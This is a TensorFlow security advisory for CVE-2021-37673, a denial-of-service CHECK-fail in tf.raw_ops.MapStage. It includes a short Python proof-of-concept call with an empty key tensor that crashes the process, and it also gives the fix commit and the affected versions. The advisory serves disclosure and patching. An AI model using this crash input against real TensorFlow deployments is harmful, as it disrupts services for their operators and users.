<h2>TFSA-2021-147: <code>CHECK</code>-fail in <code>MapStage</code></h2>
<h3>CVE Number</h3>
<p>CVE-2021-37673</p>
<h3>Impact</h3>
<p>An attacker can trigger a denial of service via a <code>CHECK</code>-fail in
<code>tf.raw_ops.MapStage</code>:</p>
<p>```python
import tensorflow as tf</p>
<p>tf.raw_ops.MapStage(
  key=tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64),
  indices=tf.constant((0), dtype=tf.int32),
  values=[tf.constant((0), dtype=tf.int32)],
  dtypes=[tf.int32,
  tf.int64],
  capacity=0,
  memory_limit=0,
  container='',
  shared_name='')
```</p>
<p>The
<a href="https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/map_stage_op.cc#L513">implementation</a>
does not check that the <code>key</code> input is a valid non-empty tensor.</p>
<h3>Patches</h3>
<p>We have patched the issue in GitHub commit
<a href="https://github.com/tensorflow/tensorflow/commit/d7de67733925de196ec8863a33445b73f9562d1d">d7de67733925de196ec8863a33445b73f9562d1d</a>.</p>
<p>The fix will be included in TensorFlow 2.6.0. We will also cherrypick this
commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are
also affected and still in supported range.</p>
<h3>For more information</h3>
<p>Please consult <a href="https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md">our security
guide</a> for
more information regarding the security model and how to contact us with issues
and questions.</p>
<h3>Attribution</h3>
<p>This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.</p>